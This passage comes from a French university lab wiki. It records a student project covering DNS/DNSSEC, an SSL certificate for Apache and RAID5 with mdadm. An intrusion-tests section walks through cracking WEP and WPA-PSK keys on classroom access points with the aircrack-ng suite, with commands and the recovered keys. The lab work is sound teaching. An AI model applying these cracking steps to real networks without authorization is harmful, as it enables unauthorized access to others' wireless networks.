                         604800 )       ; Negative Cache TTL&lt;br /&gt;
;&lt;br /&gt;
57.48.193.in-addr.arpa.         IN      NS      ns.jjlddelamuerto.space.&lt;br /&gt;
57.48.193.in-addr.arpa.         IN      NS      ns2.gandi.net.&lt;br /&gt;
&lt;br /&gt;
162                             IN      PTR     jjlddelamuerto.space.&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Nous modifions ensuite le fichier /etc/resolv.conf afin de passer par notre serveur :&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@GreenArrow:/etc/bind# vim /etc/resolv.conf&lt;br /&gt;
search jjlddelamuerto.space&lt;br /&gt;
nameserver 193.48.57.162&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Enfin, nous vérifions notre configuration :&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@GreenArrow:/etc/bind# host www.jjlddelamuerto.space&lt;br /&gt;
www.jjlddelamuerto.space has address 193.48.57.162&lt;br /&gt;
www.jjlddelamuerto.space has IPv6 address 2001:660:4401:60ba:216:3eff:fe80:efa8&lt;br /&gt;
&lt;br /&gt;
root@GreenArrow:/etc/bind# host -tany jjlddelamuerto.space&lt;br /&gt;
jjlddelamuerto.space has IPv6 address 2001:660:4401:60ba:216:3eff:fe80:efa8&lt;br /&gt;
jjlddelamuerto.space has address 193.48.57.162&lt;br /&gt;
jjlddelamuerto.space has SOA record ns.jjlddelamuerto.space. root.jjlddelamuerto.space. 2016113007 604800 86400 2419200 604800&lt;br /&gt;
jjlddelamuerto.space name server ns6.gandi.net.&lt;br /&gt;
jjlddelamuerto.space name server ns.jjlddelamuerto.space.&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== Sécurisation de site web par certificat ====&lt;br /&gt;
&lt;br /&gt;
Premièrement, sur Gandi nous lançons l'étape d'achat d'un certificat SSL.&lt;br /&gt;
Puis, sur la VM nous générons le CSR grâce à cette commande:&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@GreenArrow:/etc/apache2/sites-available/clef# openssl req -nodes -newkey rsa:2048 -sha256 -keyout GreenArrow.key -out GreenArrow.csr&lt;br /&gt;
Generating a 2048 bit RSA private key&lt;br /&gt;
&lt;br /&gt;
If you enter '.', the field will be left blank.&lt;br /&gt;
-----&lt;br /&gt;
Country Name (2 letter code) [AU]:FR&lt;br /&gt;
State or Province Name (full name) [Some-State]:Nord&lt;br /&gt;
Locality Name (eg, city) []:Lille&lt;br /&gt;
Organization Name (eg, company) [Internet Widgits Pty Ltd]:PolytechLille&lt;br /&gt;
Organizational Unit Name (eg, section) []:IMA&lt;br /&gt;
Common Name (e.g. server FQDN or YOUR name) []:jjlddelamuerto.space&lt;br /&gt;
Email Address []:&lt;br /&gt;
A challenge password []:&lt;br /&gt;
An optional company name []:&lt;br /&gt;
&lt;br /&gt;
root@GreenArrow:/etc/apache2/sites-available/clef# ls&lt;br /&gt;
GreenArrow.csr	GreenArrow.key&lt;br /&gt;
&lt;br /&gt;
root@GreenArrow:/etc/apache2/sites-available/clef# cat GreenArrow.csr&lt;br /&gt;
&lt;br /&gt;
-----BEGIN CERTIFICATE REQUEST-----&lt;br /&gt;
&amp;lt;CSR à renseigner sur Gandi lors de l'achat du certificat&amp;gt;&lt;br /&gt;
-----END CERTIFICATE REQUEST-----&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Nous continuons donc la procédure pour obtenir le certificat, et attendons donc sa mise en place.&lt;br /&gt;
&lt;br /&gt;
Pour recevoir le mail contenant le lien pour activer le certificat, nous installons les packages suivants :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@GreenArrow:~# apt-get install postfix mailx&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Une fois le certificat récupéré, nous les copions tous dans le bon répertoire, puis nous hashons le tout :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@GreenArrow:/etc/bind# cp certificat.crt /etc/ssl/certs/jjlddelamuerto.space.crt&lt;br /&gt;
root@GreenArrow:/etc/bind# cp serveur.key /etc/ssl/private/jjlddelamuerto.space.key&lt;br /&gt;
root@GreenArrow:/etc/bind# cp GandiStandardSSLCA2.pem /etc/ssl/certs/GandiStandardSSLCA2.pem&lt;br /&gt;
root@GreenArrow:/etc/bind# c_rehash /etc/ssl/certs&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Enfin, la dernière étape consiste en la modification des fichiers 000-jjlddelamuerto.space-ssl.conf et ports.conf :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@GreenArrow:/etc/apache2/sites-available# cat 000-jjlddelamuerto.space-ssl.conf &lt;br /&gt;
     &amp;lt;VirtualHost *:443&amp;gt;&lt;br /&gt;
         ServerName www.jjlddelamuerto.space&lt;br /&gt;
         ServerAlias jjlddelamuerto.space&lt;br /&gt;
         DocumentRoot /var/www/&lt;br /&gt;
         CustomLog /var/log/apache2/secure_access.log combined&lt;br /&gt;
   &lt;br /&gt;
         SSLEngine on&lt;br /&gt;
         SSLCertificateFile /etc/ssl/certs/jjlddelamuerto.space.crt&lt;br /&gt;
         SSLCertificateKeyFile /etc/ssl/private/jjlddelamuerto.space.key&lt;br /&gt;
         SSLCertificateChainFile /etc/ssl/certs/GandiStandardSSLCA2.pem&lt;br /&gt;
         SSLVerifyClient None&lt;br /&gt;
     &amp;lt;/VirtualHost&amp;gt;&lt;br /&gt;
&lt;br /&gt;
root@GreenArrow:/etc/apache2# cat ports.conf &lt;br /&gt;
Listen 80&lt;br /&gt;
&lt;br /&gt;
&amp;lt;IfModule ssl_module&amp;gt;&lt;br /&gt;
	Listen 443&lt;br /&gt;
&amp;lt;/IfModule&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;IfModule mod_gnutls.c&amp;gt;&lt;br /&gt;
	Listen 443&lt;br /&gt;
&amp;lt;/IfModule&amp;gt;&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Un redémarrage du service apache2 est maintenant nécessaire :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@GreenArrow:/etc/apache2# service apache2 stop&lt;br /&gt;
root@GreenArrow:/etc/apache2# service apache2 start&lt;br /&gt;
root@GreenArrow:/etc/apache2# service apache2 reload&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Nous pouvons voir que notre  site [https://jjlddelamuerto.space] est maintenant sécurisé, un cadenas vert est bien présent.&lt;br /&gt;
&lt;br /&gt;
==== Sécurisation de serveur DNS par DNSSEC ====&lt;br /&gt;
&lt;br /&gt;
Génération des clefs asymétriques:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
   dnssec-keygen -a RSASHA1 -b 2048 -r /dev/urandom -f KSK -n ZONE jjlddelamuerto.space&lt;br /&gt;
   dnssec-keygen -a RSASHA1 -b 1024 -r /dev/urandom -n ZONE jjlddelamuerto.space&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On modifie le nom des clefs:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@GreenArrow:/etc/bind/jjlddelamuerto.space.dnssec# ls&lt;br /&gt;
dsset-jjlddelamuerto.space.	  jjlddelamuerto.space-zsk.key&lt;br /&gt;
jjlddelamuerto.space-ksk.key	  jjlddelamuerto.space-zsk.private&lt;br /&gt;
jjlddelamuerto.space-ksk.private&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Ensuite nous signons les zones:&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@GreenArrow:/etc/bind/jjlddelamuerto.space.dnssec# dnssec-signzone -o jjlddelamuerto.space -k jjlddelamuerto.space-ksk &lt;br /&gt;
../db.jjlddelamuerto.space jjlddelamuerto.space-zsk&lt;br /&gt;
Verifying the zone using the following algorithms: RSASHA1.&lt;br /&gt;
Zone fully signed:&lt;br /&gt;
Algorithm: RSASHA1: KSKs: 1 active, 0 stand-by, 0 revoked&lt;br /&gt;
                    ZSKs: 1 active, 0 stand-by, 0 revoked&lt;br /&gt;
../db.jjlddelamuerto.space.signed&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Pour finir nous ajoutons la clef KSK sur Gandi avec l'algorithme RSA/SHA1.&lt;br /&gt;
&lt;br /&gt;
[[Fichier:jjlddnssec.png]]&lt;br /&gt;
&lt;br /&gt;
=== Tests d'intrusion ===&lt;br /&gt;
&lt;br /&gt;
==== Intrusion par changement d'adresse MAC ====&lt;br /&gt;
&lt;br /&gt;
Tout d'abord nous modifions le fichier /etc/network/interfaces:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@zebrasoma:/home/pifou# vim /etc/network/interfaces&lt;br /&gt;
auto wlan5&lt;br /&gt;
iface wlan5 inet static&lt;br /&gt;
        address 172.26.79.21&lt;br /&gt;
        netmask 255.255.240.0&lt;br /&gt;
        gateway 172.26.79.254&lt;br /&gt;
        wireless mode-managed&lt;br /&gt;
        wireless-essid Wolverine&lt;br /&gt;
        wireless-key 0123456789&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Nous vérifions ensuite que nous sommes associés à Wolverine:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@zebrasoma:/home/pifou# iwconfig&lt;br /&gt;
wlan5     IEEE 802.11abg  ESSID:&amp;quot;Wolverine&amp;quot;  &lt;br /&gt;
          Mode:Managed  Frequency:2.462 GHz  Access Point: 44:AD:D9:5F:87:00   &lt;br /&gt;
          Bit Rate=54 Mb/s   Tx-Power=200 dBm   &lt;br /&gt;
          Retry short limit:7   RTS thr:off   Fragment thr:off&lt;br /&gt;
          Encryption key:0123-4567-89&lt;br /&gt;
          Power Management:off&lt;br /&gt;
          Link Quality=50/70  Signal level=-60 dBm  &lt;br /&gt;
          Rx invalid nwid:0  Rx invalid crypt:0  Rx invalid frag:0&lt;br /&gt;
          Tx excessive retries:0  Invalid misc:0   Missed beacon:0&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Nous changeons ensuite l'@ MAC:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@zebrasoma:/home/pifou# ip link set wlan5 address 00:1a:56:a4:4b:ff&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@zebrasoma:/home/pifou# ip a&lt;br /&gt;
3: wlan5: &amp;lt;NO-CARRIER,BROADCAST,MULTICAST,UP&amp;gt; mtu 1500 qdisc mq state DOWN group default qlen 1000&lt;br /&gt;
    link/ether 00:1a:56:a4:4b:ff brd ff:ff:ff:ff:ff:ff&lt;br /&gt;
    inet 172.26.79.21/20 brd 172.26.79.255 scope global wlan5&lt;br /&gt;
       valid_lft forever preferred_lft forever&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Après le changement d'@ MAC, l'association est bien impossible:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@zebrasoma:/home/pifou# ifconfig wlan5 up&lt;br /&gt;
root@zebrasoma:/home/pifou# iwconfig        &lt;br /&gt;
wlan5     IEEE 802.11bgn  ESSID:&amp;quot;Wolverine&amp;quot;  &lt;br /&gt;
          Mode:Managed  Access Point: Not-Associated   Tx-Power=20 dBm   &lt;br /&gt;
          Retry short limit:7   RTS thr:off   Fragment thr:off&lt;br /&gt;
          Encryption key:0123-4567-89&lt;br /&gt;
          Power Management:off&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== Crackage de la clef WEP ====&lt;br /&gt;
&lt;br /&gt;
Nous avons fait le crack de la clé WEP sur cracotte08.&lt;br /&gt;
Pour cracker la clef WEP, nous avons tout d'abord utiliser airmon-ng afin de voir le statut des interfaces réseau.&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@zebrasoma:/home/pifou# airmon-ng&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Interface	Chipset		Driver&lt;br /&gt;
&lt;br /&gt;
mon0		Ralink RT2870/3070	rt2800usb - [phy1]&lt;br /&gt;
wlan0		Broadcom	wl - [phy0]&lt;br /&gt;
wlan5		Ralink RT2870/3070	rt2800usb - [phy1]&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On entre ensuite en mode monitoring sur l'interface wlan5 :&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@zebrasoma:/home/pifou# airmon-ng start wlan5&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Found 2 processes that could cause trouble.&lt;br /&gt;
If airodump-ng, aireplay-ng or airtun-ng stops working after&lt;br /&gt;
a short period of time, you may want to kill (some of) them!&lt;br /&gt;
&lt;br /&gt;
PID	Name&lt;br /&gt;
1986	avahi-daemon&lt;br /&gt;
1987	avahi-daemon&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Interface	Chipset		Driver&lt;br /&gt;
&lt;br /&gt;
mon0		Ralink RT2870/3070	rt2800usb - [phy1]&lt;br /&gt;
wlan0		Broadcom	wl - [phy0]&lt;br /&gt;
wlan5		Ralink RT2870/3070	rt2800usb - [phy1]&lt;br /&gt;
				(monitor mode enabled on mon1)&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Pour continuer, nous capturons les paquets transitant afin de collecter les paquets nécessaires au décryptage de la clef WEP. L'option --encrypt wep permet de filtrer uniquement les points d'accès WEP.&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@zebrasoma:/home/pifou# airodump-ng --encrypt wep wlan5&lt;br /&gt;
&lt;br /&gt;
 CH  5 ][ Elapsed: 0 s ][ 2016-03-31 18:36                                         &lt;br /&gt;
                                                                                                       &lt;br /&gt;
 BSSID              PWR  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID&lt;br /&gt;
                                                                                                       &lt;br /&gt;
 44:AD:D9:5F:87:00  -42        3        0    0   3  54e. WEP  WEP         Wolverine                    &lt;br /&gt;
 04:DA:D2:9C:50:50  -59        2       11    0   2  54e. WEP  WEP         cracotte01                   &lt;br /&gt;
 04:DA:D2:9C:50:56  -59        3       19    0   2  54e. WEP  WEP         cracotte07                   &lt;br /&gt;
 04:DA:D2:9C:50:59  -59        2        0    0   2  54e. WEP  WEP         cracotte10                   &lt;br /&gt;
 04:DA:D2:9C:50:57  -59        2       15    0   2  54e. WEP  WEP         cracotte08                   &lt;br /&gt;
 04:DA:D2:9C:50:52  -58        3       85   42   2  54e. WEP  WEP         cracotte03                   &lt;br /&gt;
 04:DA:D2:9C:50:54  -58        1       20    9   2  54e. WEP  WEP         cracotte05                    &lt;br /&gt;
 04:DA:D2:9C:50:55  -60        1        9    4   2  54e. WEP  WEP         cracotte06                    &lt;br /&gt;
 04:DA:D2:9C:50:51  -59        2      134   66   2  54e. WEP  WEP         cracotte02                   &lt;br /&gt;
 04:DA:D2:9C:50:53  -61        6       95   47   2  54e. WEP  WEP         cracotte04                   &lt;br /&gt;
                                                                                                       &lt;br /&gt;
 BSSID              STATION            PWR   Rate    Lost    Frames  Probe                              &lt;br /&gt;
                                                                                                        &lt;br /&gt;
 04:DA:D2:9C:50:50  00:0F:B5:92:23:75  -66   54e-48e    68       10                                     &lt;br /&gt;
 04:DA:D2:9C:50:56  00:0F:B5:92:23:71  -72   36e- 2e   133       19                                     &lt;br /&gt;
 04:DA:D2:9C:50:57  00:0F:B5:92:22:66  -66   54e-36e    89       15                                     &lt;br /&gt;
 04:DA:D2:9C:50:52  00:0F:B5:92:23:6A  -62   54e-48e    23       84                                     &lt;br /&gt;
 04:DA:D2:9C:50:54  00:0F:B5:92:23:74  -66   54e-36e   576       20                                     &lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Nous avons choisi de récuperer la clef WEP de cracotte03 (son BSSID est lié à une station)&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@zebrasoma:/home/pifou# airodump-ng --essid cracotte03 --channel 2 -w crackWEP wlan5&lt;br /&gt;
&lt;br /&gt;
 CH  2 ][ Elapsed: 12 s ][ 2016-03-31 18:42                                         &lt;br /&gt;
                                                                                                       &lt;br /&gt;
 BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID&lt;br /&gt;
                                                                                                       &lt;br /&gt;
 04:DA:D2:9C:50:52  -57  35       43     1066   87   2  54e. WEP  WEP         cracotte03               &lt;br /&gt;
                                                                                                       &lt;br /&gt;
 BSSID              STATION            PWR   Rate    Lost    Frames  Probe                             &lt;br /&gt;
                                                                                                                                   &lt;br /&gt;
 04:DA:D2:9C:50:52  00:0F:B5:92:23:6A  -64   36e-48e  1232     1067                                     &lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Enfin, nous lançons le crack de la clef à l'aide de aircrack-ng :&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@zebrasoma:/home/pifou# aircrack-ng crackWEP-02.cap&lt;br /&gt;
                           Aircrack-ng 1.2 beta3&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
                 [00:00:04] Tested 112801 keys (got 3050 IVs)&lt;br /&gt;
&lt;br /&gt;
   KB    depth   byte(vote)&lt;br /&gt;
    0    6/ 10   CD(5120) 15(4864) 6D(4864) 8C(4864) A7(4864) &lt;br /&gt;
    1   46/  1   E9(4352) 04(4096) 0E(4096) 0F(4096) 16(4096) &lt;br /&gt;
    2   14/ 42   C8(4864) 10(4608) 11(4608) 1D(4608) 58(4608) &lt;br /&gt;
    3   19/  3   CF(4864) 0A(4608) 5E(4608) 8E(4608) 90(4608) &lt;br /&gt;
    4    2/ 16   08(5632) 89(5376) 96(5376) B4(5376) F7(5376) &lt;br /&gt;
&lt;br /&gt;
Failed. Next try with 5000 IVs.&lt;br /&gt;
&amp;lt;/pre&amp;gt; &lt;br /&gt;
&lt;br /&gt;
Il est nécessaire d'être proche du point d’accès (sinon le débit est trop faible, ce qui rend l'opération longue), ainsi que de capturer un minimum de 10 000 paquets.&lt;br /&gt;
&lt;br /&gt;
Au final, nous arrivons bien à récupérer la clef WEP : &lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
                               Aircrack-ng 1.2 beta3&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
                 [00:04:10] Tested 799 keys (got 42913 IVs)&lt;br /&gt;
&lt;br /&gt;
   KB    depth   byte(vote)&lt;br /&gt;
    0    0/  1   EE(56320) B4(51712) 9D(50944) 4E(50688) 28(50432) &lt;br /&gt;
    1    1/  2   D9(55552) 3D(50176) 68(49664) 08(49408) 49(49152) &lt;br /&gt;
    2    1/  5   A2(53504) 5B(52480) 93(52480) 73(52224) 10(50432) &lt;br /&gt;
    3    1/  3   30(53248) 81(51456) 5B(49920) 6E(49920) 1E(49664) &lt;br /&gt;
    4    9/  4   9D(50176) 31(49408) 18(49152) 72(49152) E1(49152) &lt;br /&gt;
&lt;br /&gt;
             KEY FOUND! [ EE:EE:EE:EE:EE:EE:EE:EE:EE:EE:EE:E4:44 ] &lt;br /&gt;
	Decrypted correctly: 100%&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== Cassage de mot de passe WPA-PSK par force brute ====&lt;br /&gt;
Nous refaisons les mêmes actions que pour le crackage de clef WEP.&lt;br /&gt;
Cette fois nous essayons de cracker la clef WPA sur cracotte03.&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@zebrasoma:/home/pifou# airodump-ng --encrypt wpa wlan5&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@zebrasoma:/home/pifou# airodump-ng --essid cracotte03 --channel 13 -w crackWPA wlan5&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Une fois le handshake récupéré:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@zebrasoma:/home/pifou# aircrack-ng -w dico.txt crackWPA-01.cap&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
Nous avons lancé ceci sur le eeePC qui a une vitesse de traitement 5 fois inférieure à celle d'une zabeth environ (environ 5h de traitement). Puis nous obtenons le résultat suivant:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
                                   Aircrack-ng 1.2 beta3&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
                   [04:32:42] 12399908 keys tested (759.63 k/s)&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
                           KEY FOUND! [ 12399903 ]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
      Master Key     : 33 2B 69 DD 95 0A 5A E0 01 22 7E FF 98 DA 99 87 &lt;br /&gt;
                       40 7A CB CC 8A E5 32 9F FE 4E 5C 44 91 38 13 93 &lt;br /&gt;
&lt;br /&gt;
      Transient Key  : 70 EE 27 96 5B 34 B5 4F 06 A1 F2 B6 A7 16 1E 21 &lt;br /&gt;
                       7A 0B BD F4 13 67 5B 4C ED 30 A9 0D 91 E3 F9 7F &lt;br /&gt;
                       88 E6 12 68 9C 77 4B 48 EB 5E 6A 5A DD 1D D9 08 &lt;br /&gt;
                       36 40 94 7D B4 05 80 B2 60 FA 84 81 50 CE DC 87 &lt;br /&gt;
&lt;br /&gt;
      EAPOL HMAC     : 83 03 24 AC 39 AB 67 E7 7B C4 40 E8 6B 6D 7D 47 &lt;br /&gt;
&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Réalisations ===&lt;br /&gt;
==== Sécurisation des données ====&lt;br /&gt;
&lt;br /&gt;
Nous créons d'abord 3 nouvelles partitions, que nous associons à notre VM en modifiant le fichier GreenArrow.cfg :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
lvcreate -L 1G -n /dev/virtual/GreenArrow-1 -v&lt;br /&gt;
lvcreate -L 1G -n /dev/virtual/GreenArrow-2 -v&lt;br /&gt;
lvcreate -L 1G -n /dev/virtual/GreenArrow-3 -v&lt;br /&gt;
&lt;br /&gt;
'phy:/dev/virtual/GreenArrow-1,xvdd,w',&lt;br /&gt;
'phy:/dev/virtual/GreenArrow-2,xvde,w',&lt;br /&gt;
'phy:/dev/virtual/GreenArrow-3,xvdf,w',&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Il faut ensuite installer mdadm :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
apt-get install mdadm&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Nous avions une erreur à propos du subsystem. Pour que cela fonctionne, il nous manquait la commande : &lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
apt-get install linux-image-3.16.0-4-amd64&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Après un reboot de la machine, nous créons le volume /dev/md0:&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
mdadm --create /dev/md0 --level=5 --assume-clean --raid-devices=3 /dev/xvdd /dev/xvde /dev/xvdf&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Pour avoir le détail de la configuration actuelle:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@GreenArrow:~# mdadm --detail /dev/md0&lt;br /&gt;
/dev/md0:&lt;br /&gt;
        Version : 1.2&lt;br /&gt;
  Creation Time : Mon Nov 28 12:56:23 2016&lt;br /&gt;
     Raid Level : raid5&lt;br /&gt;
     Array Size : 2095104 (2046.34 MiB 2145.39 MB)&lt;br /&gt;
  Used Dev Size : 1047552 (1023.17 MiB 1072.69 MB)&lt;br /&gt;
   Raid Devices : 3&lt;br /&gt;
  Total Devices : 3&lt;br /&gt;
    Persistence : Superblock is persistent&lt;br /&gt;
&lt;br /&gt;
    Update Time : Mon Nov 28 12:56:23 2016&lt;br /&gt;
          State : clean &lt;br /&gt;
 Active Devices : 3&lt;br /&gt;
Working Devices : 3&lt;br /&gt;
 Failed Devices : 0&lt;br /&gt;
  Spare Devices : 0&lt;br /&gt;
&lt;br /&gt;
         Layout : left-symmetric&lt;br /&gt;
     Chunk Size : 512K&lt;br /&gt;
&lt;br /&gt;
           Name : GreenArrow:0  (local to host GreenArrow)&lt;br /&gt;
           UUID : f70ca72e:e8adc585:ec023dca:21061341&lt;br /&gt;
         Events : 0&lt;br /&gt;
&lt;br /&gt;
    Number   Major   Minor   RaidDevice State&lt;br /&gt;
       0     202       48        0      active sync   /dev/xvdd&lt;br /&gt;
       1     202       64        1      active sync   /dev/xvde&lt;br /&gt;
       2     202       80        2      active sync   /dev/xvdf&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Puis nous sauvons cette dernière afin de conserver md0:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@GreenArrow:~# mdadm --detail --scan &amp;gt;&amp;gt; /etc/mdadm/mdadm.conf&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Puis:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@GreenArrow:~# mkfs /dev/md0&lt;br /&gt;
root@GreenArrow:~# mkdir /datamd0&lt;br /&gt;
root@GreenArrow:/datamd0# mount /dev/md0 /datamd0/&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
Ensuite il faut éditer le fichier /etc/fstab en rajoutant la ligne suivante à la fin du fichier afin d'être surs que la partition soit encore montée après le reboot:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
/dev/md0 /datamd0&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Nous créons un fichier texte sur le raid5:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@GreenArrow:/datamd0# vim testraid5.txt&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Nous mettons en commentaire la 2ème partition dans le fichier de conf, puis redémarrons la machine:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@GreenArrow:/datamd0# mdadm --detail /dev/md0&lt;br /&gt;
/dev/md0:&lt;br /&gt;
        Version : 1.2&lt;br /&gt;
  Creation Time : Mon Nov 28 12:56:23 2016&lt;br /&gt;
     Raid Level : raid5&lt;br /&gt;
     Array Size : 2095104 (2046.34 MiB 2145.39 MB)&lt;br /&gt;
  Used Dev Size : 1047552 (1023.17 MiB 1072.69 MB)&lt;br /&gt;
   Raid Devices : 3&lt;br /&gt;
  Total Devices : 2&lt;br /&gt;
    Persistence : Superblock is persistent&lt;br /&gt;
&lt;br /&gt;
    Update Time : Mon Nov 28 13:20:27 2016&lt;br /&gt;
          State : clean, degraded &lt;br /&gt;
 Active Devices : 2&lt;br /&gt;
Working Devices : 2&lt;br /&gt;
 Failed Devices : 0&lt;br /&gt;
  Spare Devices : 0&lt;br /&gt;
&lt;br /&gt;
         Layout : left-symmetric&lt;br /&gt;
     Chunk Size : 512K&lt;br /&gt;
&lt;br /&gt;
           Name : GreenArrow:0  (local to host GreenArrow)&lt;br /&gt;
           UUID : f70ca72e:e8adc585:ec023dca:21061341&lt;br /&gt;
         Events : 4&lt;br /&gt;
&lt;br /&gt;
    Number   Major   Minor   RaidDevice State&lt;br /&gt;
       0     202       48        0      active sync   /dev/xvdd&lt;br /&gt;
       2       0        0        2      removed&lt;br /&gt;
       2     202       80        2      active sync   /dev/xvdf&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
On voit bien qu'une partition a été supprimée mais que le fichier créé auparavant est toujours présent:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@GreenArrow:~# ls /datamd0/&lt;br /&gt;
testraid5.txt&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Pour le test de réparation, afin de bien voir l'avancement de la reconstruction, nous avons procédé comme dans l'exemple du cours:&lt;br /&gt;
Suppression de la partition xvdf:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@GreenArrow:~# mdadm --set-faulty /dev/md0 /dev/xvdf&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@GreenArrow:~# mdadm --remove /dev/md0 /dev/xvdf&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
